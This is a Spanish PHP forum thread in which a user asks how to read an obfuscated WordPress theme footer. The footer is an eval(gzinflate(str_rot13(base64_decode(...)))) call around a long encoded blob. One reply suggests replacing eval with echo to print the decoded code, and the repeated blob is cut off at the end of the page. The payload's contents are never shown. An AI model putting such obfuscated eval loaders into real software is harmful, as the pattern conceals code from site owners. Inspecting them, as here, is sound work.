Foros del Web » Programando para Internet » PHP »

funcion eval - duda

Estas en el tema de funcion eval - duda en el foro de PHP en Foros del Web. buenas gente como va ? Tengo una duda, baje un tema para el wordpress y queria agregar unas lineas en el header y el footer. ...
  #1 (permalink)  
Antiguo 15/01/2008, 17:03
Avatar de andruqui  
Fecha de Ingreso: agosto-2007
Mensajes: 269
Antigüedad: 16 años, 8 meses
Puntos: 2
funcion eval - duda

buenas gente como va ?

Tengo una duda, baje un tema para el wordpress y queria agregar unas lineas en el header y el footer.

Al mirar el codigo del footer por ejemplo, el mismo es lo que sigue:

Código PHP:
<?

eval(gzinflate(str_rot13(base64_decode('DZe3EoRJElJ/UtlXUgCDp0klFd57QrKFHbz3X7+Tk9B9X99m/v3n73//KM+0//P7NnDVp3v5dJZhJY7+ryjzqSj//I+QtBI3bLHgO+DtnUlQ+9hGpPpwY53EJW6HS3MEAKXmKLiHlWuQSSiAgyBrwidtvmP1ZEEdy6jiAQFKozI75MAH3bd02kCwgYY5vy2k8WtiHMaywGXzxH3ksU8VbMXi5Isk97lSOMjBzmU0bM2JkGw/RGvao7DgmfXL+3whrsNd5zbcl6aKyGDxS5A3GH8Xjrs3urZFhfMOlGMpJeIYnih3eXXHwXAmP3e6Uijy1w5Ht92OwKjGekuVgRC1CQ0Ysc7S9SawLVp+//7JE6VjaV31FRu7xEzDFt8rlYh01+D7UuF9TlbtmY4CDmUrDyz7oLW7cmTJURXxrtOdwnnxNFSB2jqnKsyzCTdqmqChf1VxdCxk90t0L2kCh7WcKeDKBHC7vQ2ByUcrtdDj+BhOHdAOFaX+XPhpHmR1Nsmz8eqZ0UXHAVbYuy6+ojYnPtZH5iWeuTYYRrY49V1vjRJHsyEwcnzMS6tYynvQomCgglgXFEdEsxUTzJLaDdN1SSTtDzn6TKVtUktESeqFMYQLnkFv/i0p5YSW/GzlUkCvAqLi88e2XgQx5Yav1GOOBLj5JqDbqTeBslPo51aU6vp0ayCLU3oG9jpr8oQJgdAW5mK2JdU4gx4qr0M0PtsW+i0mmHht4MjEv8ED65oPorH7yzMkKy9gLUJM4zD6EueoSq1TP66KVFShE0NPf5z9YTgFq5salcczHyXnQaQgRC6/JY0f1CaFQQ8qFozKC0FAbYMRly9v0/oW0+d90lRWgyFDX6CE6tMb1DN2kEsBJMalDWqX5YQp1W5PzuR7xmUOdRMIzN0HczWmDKNclKEoevtNRGvbckY/mC7ruCR3qXqTpFxu8AZj8ziO+K6WT2lL2i4O2uC1yEr6VAKgC+2YMEWznOj9cFI+3vv5kMTF9FW/1bTYgdURfemc+aAhLWSplxPxSnPbD/JRZD4kZOY0xBeAXq9MLP8+6ziIRanhT8geFiN+h6tF23nz7IBXC4D4JQJAZahG0Kg3Od4ZSjqHh9Hn9CJk+pKMU5itAT+6EtpiQZgOUb7IumA9sl30+zwPW1biABJWb0mw5vAUpftFQS5VONdyCx193piFofBmcEM8xdj1vHCaz7nWQijoAzkO55IhRRr6BTKHuWFdUWPmmHpVh5inq0dtfHcwix80uRJkvEcm1xl1yAoRp7Lgs0Kf77TOTBL9Rdm6vC8U3gusfNBiz7IaKOlNAtCR3wnmOu+6a7AVfJZV6ig+5Ju3IkPxsrGafut/YrE5aT7IJwVwUh6f5+vtjt5Rp1UOSSmkq/y5kWvpNcX+plnnWr+Yythe2YP4UZnzG8TpvySyiNWeV/mYdHbuvgpfXgPpo+YLEzQmwHFCrQTrS7TyHr8his6petoYPYgNx1w0iFvsqoQugJ7VsrX5ibhR2F44Yem0UPb55rhiKL/bqpkh0n/Dcb6krgKzBycH1GH3EBnTrhpfutNoIy09qrcTuQaKdEBEW7pXoGQcwnr9oXHIkOjKxh/Vk6u5Sc7dGr7nfvMDL06zCB8kow6TN/Ws9VAlRCzNIWEqDKkihohfg7o5UeHDultc+iSY2LrRr1cBD7W1oNb5EQORKpVTa+BdjBV7Jfw4FiWP1CrgE3NMiPxuFkvCxqOcZchwXGapwWSuurpH/etmS02Z90Jucd9PJvdSQAqUSvlenuHIKC3w+LLvnVG4bg92+ZDKhrjx9GsE602wa7uYp0tv8cj3EL30UhXXKh5PscqWLIeMtWVg6eG5Z1XR3aB67Y3EXLRiWojByW0kxFXkjnUOFHEUctP0fPhYJsOqdwrPEtqqWsFNWYpTvvJqEKFv6d2LwHVo0moJrzfKvfdJ4TXuZ+ycfJSIlpu1vHD9R84AqXgNw46fOqGqJeAOmSz75fO2mXMIj3EDdRoR2OBUFP/tpEnZUv31vl9CzwsBEuEpLtrvmMQUd1MHUsAOQJYkx9GgFBzZl8yIMRyc+Kn2cTRlR3Dsri/zvRaXlYHwwoOeYuXeS/Euprm06Y141ec698OQiS95jwwjVX6X2yx3o0sYE5MhmYGLssP20CrVy+2Cstpx7ozYLBQHWINyiBFCl+ZaQZzARwmUZwjsGy8EJmKAfx3OtcIO0/UVvcVVW41rHPGw2Uq4rN/IBAB5kXiOpfiOPm436XGcUyYfIz++uqY8gvtO8g3yrlmYWiXpWW62JoS6OevTZSReYIQ1tQuYJrjxR/44grLXxQtVt+qh5qEoCxq/ydK7DApPX5D+/J6xLLpkq5IYhrXfpnrEJw3fzSzWDuqF9kAS8Qkk9hkmlp1kAhPWpEYZSVsCuRrb6xxMnQ5h31nwI/4whEwXPZRSFVon6A7H1FmG+EFR6QVP9w0aXtqfo11QzRy4TtShil+YtLlOO9l+vn6B9OqssfL1UgiHGKW5Bp5SiajkePsUVHtqOFptWKPCCDwMvUeVjoRcShWNzNcPt+0fo2ogVqHk45qPxolxuvTOHisEnfYRBITmK2cmdhdMRe14K5fNLomMIO/F83iWaZ7J38U7tGtK7vpwnNuaaKwkXWLIPPa2vxLrYlPpuQ4h39Xe1fVrx5FMlJ2Xoay1A++B7YA53P57jjH1HjkNlPVZkMun7A/MmvLW8jlleECgsFXt1ze8QvVBvyA4B/8uUxOMGctz0XKud5Qtlm+Sjl1S35IbIcp8LcL9LvJnZa5NVxnKRx0AF1GzK9iCYMkMv+xPAypwsFwCPPWRl9B4MFfdZmtJYb+jZkFfP5J7/xPSZWUc6c2yjABvGu+bvVYLrebJXw+7MWFQ7oEXgjnuno5/T4VKxaSsSv8LkA0E5DLSIun1uM99NKenU6u67jDGFZk177HOatjGbM/IQdNBnDpapfIb9Pi43rQ/G99ihnTfmWEKXlS001fh4v0xlJrNBnhWhgk/oua79WCwdWGAInA5Xun6rud08cWhjbgyjulA6yvAnpJIRWrTeiS01jbTVtC5gjiZ70eTB4IemRlvCxs4JtZ2r5OtfrgcsK9Fl3SLnwnm85lHaDBXMG7ch9UTMgE/ntmj8OC59iJPbB/tVlRIlDBoX4dCDGeroo9p5ZQLe5Q9EVVLkEMGdmp+PMcP7XHafwEq99uRdbhwkaTtSq3E4+hl8lxs4Ay11uuQx6GpElyDCy5tsxrfqS4+hBgRJMZ4HHM4YY+ad6coaSCsG34C9OZyY1d0qXvMK1d+9kUPUCObtHEyfdjVQi8V+3OaMcG8XnJqLbEcEYz/9SGPfoumSyyjwwrzTIvjPraqYaPr5Dkn1bzGh3AoajszPX7TJxU7rKtX0FYze3RhwV+my1iZ8iY1AVUAtq5j8RlE9r+GzS77mCBwfY5GTn3f4SafCDtPAEkRfIkcsSCTcTjSX1jg+nGPo+kteyggOTmO/YziJm9f6cfSEZO5S2//HQG6/a5q6qyMmn0XQztB6IhW71OaK/K0pEXLSz+AI8DB9DT4t57Ys0q4KQXeVF4cjFHHk6POvFuLr0nKYplfDHkMekCiS+uX3ApP/Jx9Z8Lpqq2qLr+RZtmQo6+WdKRHvxkcV3xubBVes3YkrUB0h4yvVpDh33pfrmxc7LrHMtoKHHzA4C+b1LGufbSi0S/1riUfLmwGXABkDGvMKp/wLBEMAxlfgkm8FaCQGr0spiz1KhJO2D/zklJGThduDZ9ZHke+yWTpap/63465/mYD6uFBA/G9CTFIwNOwcI91LMbT/e52IdPIUBwpjlNUf4RAasQMN8L0ZZn9obrj25IrMSNA89uSZ0WzZBbNMpSlbB4A0+mf82oc/QOHDCKdfpCFZ4zPNesb23u3hTOdB7Uew+TAagiVKIff2SQ0rZVRz3UEMUnR1JTAr9GEWkTxI62R695oIEnBaCl/ncIPh6vjN1jptXTJdpJk4YYmagVn5WS4Ej0lRQ/AbcSQawiwI3NB2Tnrz+0Fdpi0U5URLXoH0JhlpWKMz3FM95HrbEwEJBEMjRBOlfCS6AB7Nr4adzd2K4HQcD734O+USUNcYjFFtTrrmWswkp+0VHCpcznwonLdsRs0XcrBeECFA55YKNDL3kY22E8WlTsOUM3dRufC4I1aL4BLUvPi4CRYybFqhi6HUx6blngzH5mJx/ARex3bxN4SovWfq79AA04e4BlfpGZ/oNlBp/AcPTLZ2ux/dqxe+bKjUZTq3szouiFXc2Nkh14uLIg+oMg9mzWEWpK3PaQZ62GlCLnt0Xk+GG7NoqQL276q5aqMdRcOvVsgaPFTa/cXaEevxOpM9J8YgjWZrgnQBOmV0+psdzMPKkJpmsr0geIKjxaHArMvQb83PEKpPZN6UrLnU0K+sFjbdFxGE4tkf4ng5wdGUkS2aWOqMO/ds6q1ejNJIPl2L8RUg5onU0VLaqwgswW7cW0H2gNqTeP7opgI7Tp2H5H2qTrSdwFZCrF6RsQejRSwTMFwicx2LNNSuuK5A1FBStBZWsVx3759monAgjb8+hMRnfrEfZr/bYkwmjSwupcnABdgPBd5dpMSP4Nj9aXVFimmJmm3U5Y1cdALn7J7PGHVsZ2A4kcI8UvAE5/P4RwXXRV+or1G5lA8GLBEeZLoqbKul3wcg6ssbDipHIxJFgn6JvzCrd7DSLP8tip7jxU7yDhnJuEtK0uZkHCfyYMyTeH/zAaTeK1zYcIJjR3/BW8y6WZh40HzRwIlqVoZdFVKIQe3nywZFzgP7f3wIDaK2OU6OmV0FjQKIvj1a0EyxfFIj9bIFNj/sAcVP6zeRslC28CixSEpTOdKxyjm+UOyzRa1hjoUhCS6W1YolFy6fMJiSN2d3RDQHChxmOkRTONefVZsDfHUAOBCjAD9xZn7BMbEbkQCVkeMBGnJm+liNUJwhoygwD4l8dNWD+o5gsrYyH7lXB3Lq0O/qb2UotlgK6i53RKH8NuL+zgGWGQ8NNfrXFr7/fF6yoW8qOkwZOwVFmTgFeOH246gwYEkCnVlEiPW44MOzgZ34SsAHxXHB+AvZ7BRxchNq2JbOWEds6fRF1iUFaP4Xgc3wFFCNb+c1hUeiIYmg7K9sNixr8c+ycPSP1qj6NKVcHqpNelcdMzDrxOFeBta8NvnNFsXRcCcj1Iw1QXkXqgb0Iuux5bkpRHQA36D0F9eyxQ75VSMYOhdMjZBaLkNzaZGdpbwhT8qCZXC8S3Bp/wa/e7DJCagGYpltzpAv7Ol/dqwwFIaqxg16jqrkMrvRhP8vihI7nwSxb3KNk10irlHUiNTt1j6QhhiinNVJ26Zm6f/GtUT04lSTbrXUrH6wbJ84JysUwpUb6nFQeBDhhW1+AnaNOm1a5d4qQNhZfBmhU5vwtJxS9LK9p8cMQZHDU6UiU7uC5lnHZArulviynrkiBmdLxsIc5qSVIEjU6f1782jSCjsj+pYvkal3PwS008SdY4A3XGrO7WOoCyguy2+CuJYYW7dV/s9f3KH/lk0RRYKiepJsjn9KIM+GmSSlVQU21c80DmY7wXEsFH5J46m/cA5lOVsH4M6FIaXqcVvesv9A+RECAStTTsaTN74L5WJdtyAM3bLeW97XzQto6E8ewRN83ItW0axrf+Y09vZSOeKM5tg82leOy5qOR21n+dXDI7p8TW+alCHMci5MZECbcwXbAeQotEvX8QTvTYjSI6u0EqRgmBmAJ1EZRinRCvx24BsiJKJ/Gju8CR2blnWpERs+bIZWS4qsI5TtUGtWlvzl+btsuandWy7fygd/UjXOJjLQufVPE9tud6S/ppHYbfc+JGDjcJiwacg1txUphjzFzfT3+0gNYR/usLSz+pdTFyADedm09kYB4AuEIZT6reQcUMhGTVDJCHxmN8mdyfJNJhgHD5NgtRYiXy/iQ+hOXkZNgPe0AHcveC0ZBFRDZLSimj0KUMbw9dUpJiealcp0OPohML5dsSYCYbUkPSPyxnUazDa5HL0NTmyhU+4HOzY5X6bbCzGH9By8fgFaTk3/bgR91JA9uhxBUQH1l/03AVIFB3nmGjtT47qKRpzfGSaGpqlvp5WkwwDXpDJt+uwHwmdRVOIEDIzCp+Weoc3qzjBHdrO1W3JIAKdXZ+JF9azus/RGb0uzE7rk9JyAud+qBSdagGnrAcV+9QGwGnvUNPiMuXYuH3RBbOz4Sr2GRAI8is0SOn0zrggTLNrPobdGhDVgeSttj1W9UXolsFAezYbFb2/sh+A1FzJeL+fDdOuQGN9GhPyIRFmoy3w4BMUvN06gYqstiPi14dvaoIBc2daN8bO6/L7PYyZMmdUGfLGOC9ujLWz2wCtY0DiBuKkaGQqCVTCUqWrbsG+ViCTGYi6yhzO1eMAzBEzfXz0oYNzdY3QqWAxceyW2nTAeaRBCxC9+bG2a7F3Cbnq8tmkLM/KSia2q/7GwUxY3kwsaTKcyA43pZFWH8mhfrf2JvHL4GfWVHDL6dHDL8BXBHyz1C2JTTrSsTxN3lwjq82ApwQL4i56hMRo8yZGHaLL9iRzeOOUbCMke25ID4oG5n17ZHs7lDeLXngvTKF+TfhxJOgpP0HU4bE1edbHFsihWsS0oA1W3CE+W7tCK6GJQFFaWDRpJVm8MsHzejXI97lW7V65TXFF03R82mLUV1a+fBwnhrWwYIM9ZMU45RWhfrlbcu5Bsl0KGbpmun0jnwuR0csNtxk3AVH1Im4018ryvY9wdMKTs58gfOCP8CMjrzoajcm2zuSRzRp1RY0E258R6fbMexhof1BNqRQfCrqUG/7tCo8XP3PxFdl8QH5wJAc7eDJBNUgbhWyf53Vg8ZO6O0yUROI3On/sOylNnLfoP4Zpn4JyfjPG20PWn4SGL+WDgEjwXXHUyOat6pR16X5Xw9F8xHxKhMRD/oEbzXfJzU1z+kZ9AOoT1gZBf5hPR8PSecbr83upJPexnPMY0mfbvChqK6SbOuzLsZhhQNalsV+/kj5kgIULie77Lj4/F6BOULOFNKgDUSSmn60ksOkddc9CKrU1yIMav/h4quyWdWeu41b15zQvpKtJWH1qhrLCy3PgGyBye2Kv0Q+LCJWXkq3NdfAgjYRVEHegg2evRf2lruvj0K/AILY+jlgm5C5shNM8lmj6PockzJQHZZyBCQZGrgITffedim2u0UPb6s8mdOEBIEhzmi4pT9U4JIr5AMa+oQvd6+/Tx2hZJhcYwXGEj9JLkSYtOgsHYMDrVguJ7K2RsDgjjYjF/+LcnVKdCoJ5rq+aRoSb3begpEm0atGk4oyu5tbe5HQYZoTFDKXQkqEUzyLHAtIn9HqTMvWlvvle12BPllW47G73fqra/UXRTkfF05I1pfn8DM1bnqnsGu9E7+IIwda8kIaVlS4fjMy/obbtWXjYSGeAGPU3KyI5H9vnHAn4HRKY1RdE2ykPhWv3tTWmisviwwMQgZSDTeizLEzDu19VmP5A9yoLuZdSPSV0FNEqaF+YQ1+2IbLRB1eApIJNb8+y1xac+1zowB+qY6oR4haFCYc9yytrJV38V6A49/4NE+TbMPNcvOokvH46Jjvzu+lsLVcpzwXEpnFw/4m+4i8VJ/d4C099USSGseLTa2yBtYUPUQ6o43WI8ff0fZvhHE9UN4y3E95yzKp+68L6LCskn8BKvZfLWl7hSywhOVaRrEHlNOF+2Y76VM2w6K4977FBGmtBaEhGLzN4KhyCsnrFWls9FGUeUl7nT5oBzmWqClkSOKg5YYQqdVLOp7hpoIaJUbjucnS6fSSnYX60yEFr0sB8ssI27Zq/S2JuwlL6N6ZIvfS1SOfs2rovu+gYOBbAe/GGPZrVKFPLwlf+aSMkmVn9RZXkLRBTzLu5rYQWmhN8gN1gCPAY5gIiaX3V98XrOfVZHGWgU4AgKYIdTXPC6Al9zFOUpfqPoDsfSPFeyb7kW3qY3JELCaNXtr4ZqQ2dLzYeqDUdOT4k7MUCrZpQP+YeGdVPPzL2b2wTmK6gzwmrNswux+XCGcn4i6LoOdoY0puNPzaCSJrRRrHf2IPWr5LWhRhMCcDzSlXdYjvuOhpLmccmLYoLqjcn5ttAS6xuR8PCx+8zdW5+ZfLB9oxFlND/gfk3I0LLlkdPurztSs0DfrW6vO0/89JhRBfPm2aOauj58OhaFtAJOLXMn/8hcozvMWuByRdEyyUZThKgxuZ6p7v7qHsQUKY3SwzUfKfu52aMMhlrJ10CTglA6oSNV2behJys+qYM5KlHwpjck7EAIn+XA67d3KZo4u17OZdtWabFHVxhxH4beGTGkGIcP02FJh5ypmTKYuOKMsCeDFfTpWX3eaCFJwiSJAmCoGyeJ1UQFFUy//nrr7/++8e///z97/8B')))); 

?>
Como puedo 'desarmar' este codigo y ver el codigo puro para poder agregar mis lineas.
Hay manera ?

Saludos
Andres
  #2 (permalink)  
Antiguo 15/01/2008, 18:38
(Desactivado)
 
Fecha de Ingreso: diciembre-2006
Mensajes: 225
Antigüedad: 17 años, 4 meses
Puntos: 1
Re: funcion eval - duda

la verdad es lo unico q conosco es un script q lo puedes conseguir en esta web

foro.dragonjar.us

en el foro de php este script decodifica los datos codificados en base64 es lo unico q conosco probalo a ver si te funca
  #3 (permalink)  
Antiguo 15/01/2008, 18:49
 
Fecha de Ingreso: mayo-2006
Mensajes: 288
Antigüedad: 17 años, 11 meses
Puntos: 4
Re: funcion eval - duda

muy facil has esto:

Código PHP:

echo gzinflate(str_rot13(base64_decode('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